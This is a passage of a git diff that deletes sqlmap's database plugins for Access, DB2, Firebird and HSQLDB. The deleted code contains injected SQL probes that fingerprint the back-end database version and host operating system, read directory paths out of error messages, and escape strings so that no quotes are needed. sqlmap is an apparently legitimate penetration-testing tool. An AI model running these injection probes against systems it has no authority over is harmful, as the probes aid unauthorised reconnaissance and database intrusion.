Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.ACCESS) - - def _sandBoxCheck(self): - # Reference: http://milw0rm.com/papers/198 - retVal = None - table = None - - if Backend.isVersionWithin(("97", "2000")): - table = "MSysAccessObjects" - elif Backend.isVersionWithin(("2002-2003", "2007")): - table = "MSysAccessStorage" - - if table is not None: - result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table) - retVal = "not sandboxed" if result else "sandboxed" - - return retVal - - def _sysTablesCheck(self): - infoMsg = "executing system table(s) existence fingerprint" - logger.info(infoMsg) - - # Microsoft Access table reference updated on 01/2010 - sysTables = { - "97": ("MSysModules2", "MSysAccessObjects"), - "2000" : ("!MSysModules2", "MSysAccessObjects"), - "2002-2003" : ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), - "2007" : ("MSysAccessStorage", "MSysNavPaneObjectIDs"), - } - # MSysAccessXML is not a reliable system table because it doesn't always exist - # ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty") - - for version, tables in sysTables.items(): - exist = True - - for table in tables: - negate = False - - if table[0] == '!': - negate = True - table = table[1:] - - result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE [RANDNUM]=[RANDNUM])" % table) - if result is None: - result = False - - if negate: - result = not result - - exist &= result - - if not exist: - break - - if exist: - return version - - return None - - def _getDatabaseDir(self): - retVal = None - - infoMsg = "searching for database directory" - logger.info(infoMsg) - - randStr = randomStr() - inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr)) - - if wasLastResponseDBMSError(): - threadData = getCurrentThreadData() - match = re.search("Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1]) - - if match: - retVal = match.group(1).rstrip("%s.mdb" % randStr) - - if retVal.endswith('\\'): - retVal = retVal[:-1] - - return retVal - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.ACCESS - return value - - actVer = Format.getDbms() + " (%s)" % (self._sandBoxCheck()) - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" - - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - value += "\ndatabase directory: '%s'" % self._getDatabaseDir() - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or (conf.dbms or "").lower() in ACCESS_ALIASES): - setDbms(DBMS.ACCESS) - - return True - - infoMsg = "testing %s" % DBMS.ACCESS - logger.info(infoMsg) - - result = inject.checkBooleanExpression("VAL(CVAR(1))=1") - - if result: - infoMsg = "confirming %s" % DBMS.ACCESS - logger.info(infoMsg) - - result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS - logger.warn(warnMsg) - return False - - setDbms(DBMS.ACCESS) - - if not conf.extensiveFp: - return True - - infoMsg = "actively fingerprinting %s" % DBMS.ACCESS - logger.info(infoMsg) - - version = self._sysTablesCheck() - - if version is not None: - Backend.setVersion(version) - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS - logger.warn(warnMsg) - - return False - - def forceDbmsEnum(self): - conf.db = ("%s%s" % (DBMS.ACCESS, METADB_SUFFIX)).replace(' ', '_') diff --git a/plugins/dbms/access/syntax.py b/plugins/dbms/access/syntax.py deleted file mode 100644 index 54433982..00000000 --- a/plugins/dbms/access/syntax.py +++ /dev/null @@ -1,19 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - def escaper(value): - return "&".join("CHR(%d)" % ord(_) for _ in value) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/access/takeover.py b/plugins/dbms/access/takeover.py deleted file mode 100644 index cf36259a..00000000 --- a/plugins/dbms/access/takeover.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "on Microsoft Access it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "on Microsoft Access it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "on Microsoft Access it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "on Microsoft Access it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/db2/__init__.py b/plugins/dbms/db2/__init__.py deleted file mode 100644 index 59fdfd36..00000000 --- a/plugins/dbms/db2/__init__.py +++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import DB2_SYSTEM_DBS -from lib.core.unescaper import unescaper - -from plugins.dbms.db2.enumeration import Enumeration -from plugins.dbms.db2.filesystem import Filesystem -from plugins.dbms.db2.fingerprint import Fingerprint -from plugins.dbms.db2.syntax import Syntax -from plugins.dbms.db2.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class DB2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines DB2 methods - """ - - def __init__(self): - self.excludeDbsList = DB2_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.DB2] = Syntax.escape diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py deleted file mode 100644 index 5c08561b..00000000 --- a/plugins/dbms/db2/connector.py +++ /dev/null @@ -1,63 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import ibm_db_dbi -except ImportError: - pass - -import logging - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://code.google.com/p/ibm-db/ - User guide: http://code.google.com/p/ibm-db/wiki/README - API: http://www.python.org/dev/peps/pep-0249/ - License: Apache License 2.0 - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - - try: - database = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port) - self.connector = ibm_db_dbi.connect(database, self.user, self.password) - except ibm_db_dbi.OperationalError, msg: - raise SqlmapConnectionException(msg) - - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except ibm_db_dbi.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - try: - self.cursor.execute(query) - except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except ibm_db_dbi.InternalError, msg: - raise SqlmapConnectionException(msg[1]) - - self.connector.commit() - - def select(self, query): - self.execute(query) - return self.fetchall() diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py deleted file mode 100644 index 19ba22bc..00000000 --- a/plugins/dbms/db2/enumeration.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - - -from lib.core.data import logger -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getPasswordHashes(self): - warnMsg = "on DB2 it is not possible to list password hashes" - logger.warn(warnMsg) - - return {} - diff --git a/plugins/dbms/db2/filesystem.py b/plugins/dbms/db2/filesystem.py deleted file mode 100644 index 9cfc1862..00000000 --- a/plugins/dbms/db2/filesystem.py +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py deleted file mode 100644 index 15a8b8c4..00000000 --- a/plugins/dbms/db2/fingerprint.py +++ /dev/null @@ -1,167 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.session import setDbms -from lib.core.settings import DB2_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.DB2) - - def _versionCheck(self): - minor, major = None, None - - for version in reversed(xrange(5, 15)): - result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM sysibm.sysversions WHERE versionnumber BETWEEN %d000000 AND %d999999)>0" % (version, version)) - - if result: - major = version - - for version in reversed(xrange(0, 20)): - result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM sysibm.sysversions WHERE versionnumber BETWEEN %d%02d0000 AND %d%02d9999)>0" % (major, version, major, version)) - if result: - minor = version - version = "%s.%s" % (major, minor) - break - - break - - if major and minor: - return "%s.%s" % (major, minor) - else: - return None - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.DB2 - return value - - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(DB2_ALIASES) or (conf.dbms or "").lower() in DB2_ALIASES): - setDbms(DBMS.DB2) - - return True - - logMsg = "testing %s" % DBMS.DB2 - logger.info(logMsg) - - result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1)") - - if result: - logMsg = "confirming %s" % DBMS.DB2 - logger.info(logMsg) - - version = self._versionCheck() - - if version: - Backend.setVersion(version) - setDbms("%s %s" % (DBMS.DB2, Backend.getVersion())) - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.DB2 - logger.warn(warnMsg) - - return False - - def checkDbmsOs(self, detailed=False): - if Backend.getOs(): - return - - infoMsg = "fingerprinting the back-end DBMS operating system " - infoMsg += "version and service pack" - logger.info(infoMsg) - - query = "(SELECT LENGTH(OS_NAME) FROM SYSIBMADM.ENV_SYS_INFO WHERE OS_NAME LIKE '%WIN%')>0" - result = inject.checkBooleanExpression(query) - - if not result: - Backend.setOs(OS.LINUX) - else: - Backend.setOs(OS.WINDOWS) - - infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() - - if result: - versions = { "2003": ("5.2", (2, 1)), - "2008": ("7.0", (1,)), - "2000": ("5.0", (4, 3, 2, 1)), - "7": ("6.1", (1, 0)), - "XP": ("5.1", (2, 1)), - "NT": ("4.0", (6, 5, 4, 3, 2, 1)) } - - # Get back-end DBMS underlying operating system version - for version, data in versions.items(): - query = "(SELECT LENGTH(OS_VERSION) FROM SYSIBMADM.ENV_SYS_INFO WHERE OS_VERSION = '%s')>0" % data[0] - result = inject.checkBooleanExpression(query) - - if result: - Backend.setOsVersion(version) - infoMsg += " %s" % Backend.getOsVersion() - break - - if not Backend.getOsVersion(): - return - - # Get back-end DBMS underlying operating system service pack - for sp in versions[Backend.getOsVersion()][1]: - query = "(SELECT LENGTH(OS_RELEASE) FROM SYSIBMADM.ENV_SYS_INFO WHERE OS_RELEASE LIKE '%Service Pack " + str(sp) + "%')>0" - result = inject.checkBooleanExpression(query) - - if result: - Backend.setOsServicePack(sp) - break - - if not Backend.getOsServicePack(): - Backend.setOsServicePack(0) - debugMsg = "assuming the operating system has no service pack" - logger.debug(debugMsg) - - if Backend.getOsVersion(): - infoMsg += " Service Pack %d" % Backend.getOsServicePack() - - logger.info(infoMsg) diff --git a/plugins/dbms/db2/syntax.py b/plugins/dbms/db2/syntax.py deleted file mode 100644 index ffd9141c..00000000 --- a/plugins/dbms/db2/syntax.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar' - """ - - def escaper(value): - return "||".join("CHR(%d)" % ord(_) for _ in value) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/db2/takeover.py b/plugins/dbms/db2/takeover.py deleted file mode 100644 index d1504b06..00000000 --- a/plugins/dbms/db2/takeover.py +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - self.__basedir = None - self.__datadir = None - - GenericTakeover.__init__(self) diff --git a/plugins/dbms/firebird/__init__.py b/plugins/dbms/firebird/__init__.py deleted file mode 100644 index d0ec59a3..00000000 --- a/plugins/dbms/firebird/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import FIREBIRD_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.firebird.enumeration import Enumeration -from plugins.dbms.firebird.filesystem import Filesystem -from plugins.dbms.firebird.fingerprint import Fingerprint -from plugins.dbms.firebird.syntax import Syntax -from plugins.dbms.firebird.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class FirebirdMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines Firebird methods - """ - - def __init__(self): - self.excludeDbsList = FIREBIRD_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.FIREBIRD] = Syntax.escape diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py deleted file mode 100644 index ab7c5275..00000000 --- a/plugins/dbms/firebird/connector.py +++ /dev/null @@ -1,69 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import kinterbasdb -except ImportError: - pass - -import logging - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from lib.core.settings import UNICODE_ENCODING -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://kinterbasdb.sourceforge.net/ - User guide: http://kinterbasdb.sourceforge.net/dist_docs/usage.html - Debian package: python-kinterbasdb - License: BSD - """ - - def __init__(self): - GenericConnector.__init__(self) - - # sample usage: - # ./sqlmap.py -d "firebird://sysdba:testpass@/opt/firebird/testdb.fdb" - # ./sqlmap.py -d "firebird://sysdba:testpass@127.0.0.1:3050//opt/firebird/testdb.fdb" - def connect(self): - self.initConnection() - - if not self.hostname: - self.checkFileDb() - - try: - self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), \ - user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") # Reference: http://www.daniweb.com/forums/thread248499.html - except kinterbasdb.OperationalError, msg: - raise SqlmapConnectionException(msg[1]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - try: - self.cursor.execute(query) - except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except kinterbasdb.Error, msg: - raise SqlmapConnectionException(msg[1]) - - self.connector.commit() - - def select(self, query): - self.execute(query) - return self.fetchall() diff --git a/plugins/dbms/firebird/enumeration.py b/plugins/dbms/firebird/enumeration.py deleted file mode 100644 index 6e6e93be..00000000 --- a/plugins/dbms/firebird/enumeration.py +++ /dev/null @@ -1,41 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getDbs(self): - warnMsg = "on Firebird it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) - - return [] - - def getPasswordHashes(self): - warnMsg = "on Firebird it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) - - return {} - - def searchDb(self): - warnMsg = "on Firebird it is not possible to search databases" - logger.warn(warnMsg) - - return [] - - def searchColumn(self): - warnMsg = "on Firebird it is not possible to search columns" - logger.warn(warnMsg) - - return [] - - def getHostname(self): - warnMsg = "on Firebird it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/firebird/filesystem.py b/plugins/dbms/firebird/filesystem.py deleted file mode 100644 index 7711fc53..00000000 --- a/plugins/dbms/firebird/filesystem.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "on Firebird it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on Firebird it is not possible to write files" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py deleted file mode 100644 index f32ff494..00000000 --- a/plugins/dbms/firebird/fingerprint.py +++ /dev/null @@ -1,162 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.common import randomRange -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.session import setDbms -from lib.core.settings import FIREBIRD_ALIASES -from lib.core.settings import METADB_SUFFIX -from lib.core.settings import UNKNOWN_DBMS_VERSION -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.FIREBIRD) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - actVer = Format.getDbms() - - if not conf.extensiveFp: - value += actVer - return value - - actVer = Format.getDbms() + " (%s)" % (self._dialectCheck()) - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" - - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def _sysTablesCheck(self): - retVal = None - table = ( - ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)), - ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")), - ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")), - ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")), - # TODO: add test for Firebird 2.5 - ) - - for i in xrange(len(table)): - version, checks = table[i] - failed = False - check = checks[randomRange(0, len(checks) - 1)].replace("%d", getUnicode(randomRange(1, 100))) - result = inject.checkBooleanExpression(check) - - if result: - retVal = version - else: - failed = True - break - - if failed: - break - - return retVal - - def _dialectCheck(self): - retVal = None - - if Backend.getIdentifiedDbms(): - result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)") - retVal = "dialect 3" if result else "dialect 1" - - return retVal - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \ - or (conf.dbms or "").lower() in FIREBIRD_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - - setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion())) - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.FIREBIRD - logger.info(infoMsg) - - result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM RDB$DATABASE WHERE [RANDNUM]=[RANDNUM])>0") - - if result: - infoMsg = "confirming %s" % DBMS.FIREBIRD - logger.info(infoMsg) - - result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD - logger.warn(warnMsg) - - return False - - setDbms(DBMS.FIREBIRD) - - infoMsg = "actively fingerprinting %s" % DBMS.FIREBIRD - logger.info(infoMsg) - - version = self._sysTablesCheck() - - if version is not None: - Backend.setVersion(version) - setDbms("%s %s" % (DBMS.FIREBIRD, version)) - - self.getBanner() - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD - logger.warn(warnMsg) - - return False - - def forceDbmsEnum(self): - conf.db = "%s%s" % (DBMS.FIREBIRD, METADB_SUFFIX) - - if conf.tbl: - conf.tbl = conf.tbl.upper() diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py deleted file mode 100644 index e8d340bd..00000000 --- a/plugins/dbms/firebird/syntax.py +++ /dev/null @@ -1,37 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import isDBMSVersionAtLeast -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Backend.setVersion('2.0') - ['2.0'] - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - "SELECT 'abcdefgh' FROM foobar" - >>> Backend.setVersion('2.1') - ['2.1'] - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT ASCII_CHAR(97)||ASCII_CHAR(98)||ASCII_CHAR(99)||ASCII_CHAR(100)||ASCII_CHAR(101)||ASCII_CHAR(102)||ASCII_CHAR(103)||ASCII_CHAR(104) FROM foobar' - """ - - def escaper(value): - return "||".join("ASCII_CHAR(%d)" % ord(_) for _ in value) - - retVal = expression - - if isDBMSVersionAtLeast("2.1"): - retVal = Syntax._escape(expression, quote, escaper) - - return retVal diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py deleted file mode 100644 index 79e87dc8..00000000 --- a/plugins/dbms/firebird/takeover.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "on Firebird it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "on Firebird it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "on Firebird it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "on Firebird it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/hsqldb/__init__.py b/plugins/dbms/hsqldb/__init__.py deleted file mode 100644 index 6e73f59f..00000000 --- a/plugins/dbms/hsqldb/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import HSQLDB_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.hsqldb.enumeration import Enumeration -from plugins.dbms.hsqldb.filesystem import Filesystem -from plugins.dbms.hsqldb.fingerprint import Fingerprint -from plugins.dbms.hsqldb.syntax import Syntax -from plugins.dbms.hsqldb.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class HSQLDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines HSQLDB methods - """ - - def __init__(self): - self.excludeDbsList = HSQLDB_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.HSQLDB] = Syntax.escape diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py deleted file mode 100644 index 48fc5aef..00000000 --- a/plugins/dbms/hsqldb/connector.py +++ /dev/null @@ -1,94 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import jaydebeapi - import jpype -except ImportError, msg: - pass - -import logging - -from lib.core.common import checkFile -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ - User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html - API: - - Debian package: - - License: LGPL & Apache License 2.0 - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - try: - msg = "what's the location of 'hsqldb.jar'? " - jar = readInput(msg) - checkFile(jar) - args = "-Djava.class.path=%s" % jar - jvm_path = 